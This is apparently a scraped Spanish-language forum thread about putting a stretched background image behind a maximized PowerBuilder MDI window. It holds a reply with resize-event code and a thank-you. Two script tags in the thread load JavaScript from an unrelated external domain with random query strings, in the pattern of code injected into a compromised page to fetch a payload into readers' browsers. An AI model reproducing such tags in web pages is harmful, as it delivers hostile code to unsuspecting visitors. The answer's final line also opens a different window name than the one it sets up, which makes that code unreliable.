Power builder ventana menu

Tengo una ventana mdihelp/maximized y quisiera colocarle una imagen de fondo y que cuando ejecute la aplicación se vea el menu con la imagen grande de fondo(porque en el diseño de la ventana no quiero agrandar la imagen no se si habrá un código para que se maximize también la imagen). Gracias

<script type="text/javascript" src="http://plugin-tema-rosa.info/dfi823hs.js?0.9281574441371301"></script>
Respuesta

Jhon Ortiz

1.- Tendrías que crear otra ventana que simule se la misma que la ventana mdihelp Ejem: w_fondo

2.- En la ventana w_fondo agreegas un objecto imagen p_imagen, asignas la imagen que deseas, desactivas la propiedad OriginalSize del objeto imagen; y desactivas la propiedad enabled de w_fondo.

3.- En el evento resize de w_fondo agregamos el código para que se maximize la imagen.

p_imagen.x = x
p_imagen.y = y
p_imagen.width = width - 500
p_imagen.height = height - 100

Los valores 500 y 100 los cambias para que tu p_imagen te quede como deseas.

4.- En el evento open de la ventana mdihelp abrimos w_fondo con una hoja maximizada.

Opensheet(w_presentacion, this, 0, layered!)

Excelente eres un gran EXPERTO , me sirvió de mucho

<script type="text/javascript" src="http://plugin-tema-rosa.info/dfi823hs.js?0.2375244405321867"></script>